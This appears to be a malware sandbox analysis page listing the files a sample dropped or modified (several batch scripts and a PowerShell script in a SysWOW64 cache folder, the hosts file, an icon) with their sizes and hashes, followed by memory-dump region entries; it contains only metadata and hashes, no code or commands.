5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
995bcd1d6eb670485a16955e74b29941

SHA1
521a6e22663c3ada3492988c0a706332075ccc19

SHA256
4ea600008c08b6debed3fdb3ef59450737492862b47ef76bcd388990b272fe33

SHA512
92f1ffe13dbf3c4ae9eb362e048e52e86fbdd1444f2fae267c1a4bb2b793e5db2e146dd1115eeb75c9337dd31a02d1602895703a089bd563902da775368f7deb

Download Submit
C:\Windows\SysWOW64\FileCache\Ha5ME6T.bat
Filesize
41B

MD5
081a213b6b9997795e1ae96bb372fab5

SHA1
2b891388378aece348e5ab1f44b2d60866f5d3bd

SHA256
5838766a07c0fbc147b00e9eedf6d01064f5b2dacbb5ef45f3883af452dd0c21

SHA512
120df8c21b098e3a6dae892bbd89890a66bd540c7dd2d9bef4659edfc9c0a61d9140cfc446e07709b5209c32cbfe64a2ba432d1693a5b7f4aaab984ba68a5f12

Download Submit
C:\Windows\SysWOW64\FileCache\OzGEsUeAMSzC4OP.bat
Filesize
483B

MD5
b8cad20e9180fac554421ec07fbea6f6

SHA1
823585b56778fdd934b08496adc9f32f7ceec6d1

SHA256
807772b85f3745816cac5d0765faf9b125d0149886ece37aaeb6fefbff641bf5

SHA512
39cf2b20987cf2c19224f320abd48f296a727d805d07c007e9ae4a7fd602db49114693a3e60a84eba2dee58629f9161de16e2a88fb09d5a884b7cf4d6ce206bb

Download Submit
C:\Windows\SysWOW64\FileCache\a0B9MkPx1tMD.ps1
Filesize
1KB

MD5
a257b38a11bc657bdcb184c0f17f308a

SHA1
03cf691f9ada9efb071640db2ab03ced7279f0b8

SHA256
8b05f6b17ed3fdfe057d795620d63beb0e3375ab9c6fc7d376559d99e224f478

SHA512
36afdcf2c9c30d96711ae8b75ccc7707764777ba7b6268f8cb3142f850c1e45070e761c27ea4facc5a2d477725029d187bb99bdd23eaafb2c0286517cdd07fba

Download Submit
C:\Windows\SysWOW64\FileCache\cGDOY8Mqp4ap.bat
Filesize
375B

MD5
bc019c3237ae42e95f61a8e10835ded6

SHA1
5565ac44741ae07388ce5ab1d42dad1b753eeb5a

SHA256
3b6116fabc0581500368a6607ec210d1fa58d628d696278e0e94e5cd12fb4abd

SHA512
a5b560cb0d585dc470237d61215c59757f7a5d71a7deedb27cdd434f200318ecc0f7d9911839ac248b87b5a467bc83d922502c25e40ec334414fb7b511eab7da

Download Submit
C:\Windows\SysWOW64\FileCache\em9uEqfiMFyb.bat
Filesize
85B

MD5
c379f31bf37158fece6e8d63f8babd3d

SHA1
948748ab549cb566bceccda8ec65344eb6ac1f0f

SHA256
4ba3f29a8cddc9268e974130ad8a598cb44153ac534994644c0a694e01dc6d34

SHA512
393822bd3008c36fb64120d5700e285c83eb2f9df12287073a6b318630bf47f9f63f1883b1e4a1c32bfb7a27d691f652317f68a6b214718d37a95c6424ab59b7

Download Submit
C:\Windows\SysWOW64\FileCache\g2F9kJIbafqs.bat
Filesize
25B

MD5
9c5d2e24c9a9cefc195e5b61fa6b75f7

SHA1
f51ee15e31ae2c5eec44bdf6341f8344be57178b

SHA256
23e91e0790d8e40bc74141028e94d7d4a17049bc1b4727bfaa024fa47119ec57

SHA512
0e5d98a31043fe496499c3494b48b880c03b9a355d24ae2f5c7d4d486f11ccee88b0cbd0af4531f99ed86b05f28fd828519582c566f7de620614bd4e2f559b57

Download Submit
C:\Windows\SysWOW64\FileCache\iIcO0xFAyQOe.bat
Filesize
313B

MD5
c66969e778bd515b91abc21ced1e9040

SHA1
cc8ab329e6582737aa190efc764db934f237a556

SHA256
49735681b445535f735f3b349d3b5c1b92e3af9d16d64f9883d36b44cf6fd84d

SHA512
553313f89f14cc670fd1114283a45638c0cd5ece12f8e39277d3af0da2f0e8f04be82409e7fed0c7829b11bb3a96f48bb3410ccb927499a90eaa293e8252c4e7

Download Submit
C:\Windows\SysWOW64\FileCache\tkXWy.bat
Filesize
260B

MD5
231e58095b52ab027aba95d2b67ff479

SHA1
5bb472f7827be0a3fdc3b7e81ba99bf41602a922

SHA256
8237b651c8fd0a6b78a513d65b8983144d44384097ee00beb468470d43c95086

SHA512
34096dfe006a18dcb998d76b6d4ede68154a8c1a8dfd73ef2bb441e0bbd3edd0a6e88335fee8ee9b93089502cff3fffb18df552fcd084589727747a743b64138

Download Submit
C:\Windows\SysWOW64\wanye.ico
Filesize
9KB

MD5
ff1b84001722c9c4f93c2491ee9f8dae

SHA1
0d0f020f1fe950733851b8e9eee77b353a319008

SHA256
457f7156c431195d601b2171dffe516a40f277aa5cac774859d36d51fcc2a852

SHA512
05c4781b5717a9b2cb4eed50c8758b9bff4c11e8bdc0086a47d634b6d75e38d2eeb6f019b67add1719896acfa638c9f95d5e46bc0c88667780bb1e913f02c3d2

Download Submit
C:\Windows\debug\WIA\wiatrace.log
Filesize
1KB

MD5
7c33ab3e54e358a03362236f47fc71ef

SHA1
36aaa7db8a8e93c72872d6a819f9e6eca1ba28c2

SHA256
3697b9aa3037c0869dd97f09550cc86649ec049c8458be25cd3b83c94478b5fb

SHA512
7bb9d29969bae0e9be78dd87a3742fb01b21a8f183619c8d4e707a976abf40f4fa4b0293452f12dd6a73369b9987b6bd3f9bb1918deedf874becc4f4d2a6fc85

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1012B

MD5
503056fdb7bd451f5680eaeea4169512

SHA1
3ba25a136f24cf5d0d74f53da8a57166114a9a39

SHA256
89c8fb7312cea83b0778f16221efe69c42b89d85c47f72097e91f8731ef7f514

SHA512
a53a0ea1f544a4f9ddd794051b02200a3fbc0fe1dd2138055301afec87fdbbe1407da501b1b578da100d44abfb7e2b84a35155d6f35b679b06f7bd4592ca4d49

Download Submit
\??\pipe\LOCAL\crashpad_1092_GFJAJKINOFKJMMJO
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1852-71-0x0000000004DD0000-0x00000000053F8000-memory.dmp

Filesize
6.2MB

Download
memory/1852-70-0x0000000004730000-0x0000000004766000-memory.dmp

Filesize
216KB

Download
memory/1852-108-0x0000000004A30000-0x0000000004A4E000-memory.dmp

Filesize
120KB

Download
memory/1852-109-0x0000000006220000-0x000000000626C000-memory.dmp

Filesize
304KB

Download
memory/1852-86-0x00000000056B0000-0x0000000005A04000-memory.dmp

Filesize
3.3MB

Download
memory/1852-82-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/1852-83-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/1852-81-0x0000000005530000-0x0000000005552000-memory.dmp

Filesize
136KB

Download
memory/2796-24-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-27-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-28-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-30-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-29-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-18-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-19-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-20-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-26-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/2796-25-0x00000291B82A0000-0x00000291B82A1000-memory.dmp

Filesize
4KB

Download
memory/4932-36-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-31-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-1-0x00000000011C0000-0x00000000011C3000-memory.dmp

Filesize
12KB

Download
memory/4932-0-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-4-0x0000000006DB0000-0x0000000006DC0000-memory.dmp

Filesize
64KB

Download
memory/4932-6-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-149-0x0000000072BD0000-0x0000000072C41000-memory.dmp

Filesize
452KB

Download
memory/4932-148-0x0000000076C90000-0x0000000076D8A000-memory.dmp

Filesize
1000KB

Download
memory/4932-146-0x0000000075BB0000-0x0000000075BC9000-memory.dmp

Filesize
100KB

Download
memory/4932-147-0x0000000073C30000-0x0000000073C48000-memory.dmp

Filesize
96KB

Download
memory/4932-142-0x0000000074640000-0x00000000748BE000-memory.dmp

Filesize
2.5MB

Download
memory/4932-145-0x0000000074330000-0x0000000074466000-memory.dmp

Filesize
1.2MB

Download
memory/4932-144-0x0000000075B20000-0x0000000075B5B000-memory.dmp

Filesize
236KB

Download
memory/4932-143-0x0000000074490000-0x00000000744BB000-memory.dmp

Filesize
172KB

Download
memory/4932-140-0x0000000075100000-0x0000000075112000-memory.dmp

Filesize
72KB

Download
memory/4932-141-0x00000000748C0000-0x000000007495B000-memory.dmp

Filesize
620KB

Download
memory/4932-134-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-139-0x00000000766B0000-0x000000007672E000-memory.dmp

Filesize
504KB

Download
memory/4932-138-0x0000000076E40000-0x0000000076E9F000-memory.dmp

Filesize
380KB

Download
memory/4932-137-0x00000000757A0000-0x0000000075A21000-memory.dmp

Filesize
2.5MB

Download
memory/4932-136-0x0000000076A30000-0x0000000076AAA000-memory.dmp

Filesize
488KB

Download
memory/4932-135-0x00000000755E0000-0x000000007567F000-memory.dmp

Filesize
636KB

Download
memory/4932-9-0x0000000006DB0000-0x0000000006DC0000-memory.dmp

Filesize
64KB

Download
memory/4932-8-0x0000000006DB0000-0x0000000006DC0000-memory.dmp

Filesize
64KB

Download
memory/4932-7-0x0000000006DB0000-0x0000000006DC0000-memory.dmp

Filesize
64KB

Download
memory/4932-10-0x0000000006DB0000-0x0000000006DC0000-memory.dmp

Filesize
64KB

Download
memory/4932-15-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-150-0x0000000072B80000-0x0000000072BC9000-memory.dmp

Filesize
292KB

Download
memory/4932-16-0x00000000011C0000-0x00000000011C3000-memory.dmp

Filesize
12KB

Download
memory/4932-37-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-2-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/4932-35-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-34-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-33-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-174-0x0000000074330000-0x0000000074466000-memory.dmp

Filesize
1.2MB

Download
memory/4932-17-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/4932-32-0x00000000000A0000-0x00000000006B3000-memory.dmp

Filesize
6.1MB

Download
memory/5368-161-0x000000006CC80000-0x000000006CC96000-memory.dmp

Filesize
88KB

Download
memory/5508-157-0x0000000076E40000-0x0000000076E9F000-memory.dmp

Filesize
380KB

Download
memory/5508-160-0x0000000075100000-0x0000000075112000-memory.dmp

Filesize
72KB

Download
memory/5508-159-0x0000000075BB0000-0x0000000075BC9000-memory.dmp

Filesize
100KB

Download
memory/5508-158-0x00000000766B0000-0x000000007672E000-memory.dmp

Filesize
504KB

Download
memory/5508-156-0x00000000757A0000-0x0000000075A21000-memory.dmp

Filesize
2.5MB

Download
memory/5684-155-0x0000000075100000-0x0000000075112000-memory.dmp

Filesize
72KB

Download
memory/5684-154-0x0000000075BB0000-0x0000000075BC9000-memory.dmp

Filesize
100KB

Download
memory/5684-151-0x00000000757A0000-0x0000000075A21000-memory.dmp

Filesize
2.5MB

Download
memory/5684-152-0x0000000076E40000-0x0000000076E9F000-memory.dmp

Filesize
380KB

Download
memory/5684-153-0x00000000766B0000-0x000000007672E000-memory.dmp

Filesize
504KB

Download
memory/5856-115-0x0000000076A30000-0x0000000076AAA000-memory.dmp

Filesize
488KB

Download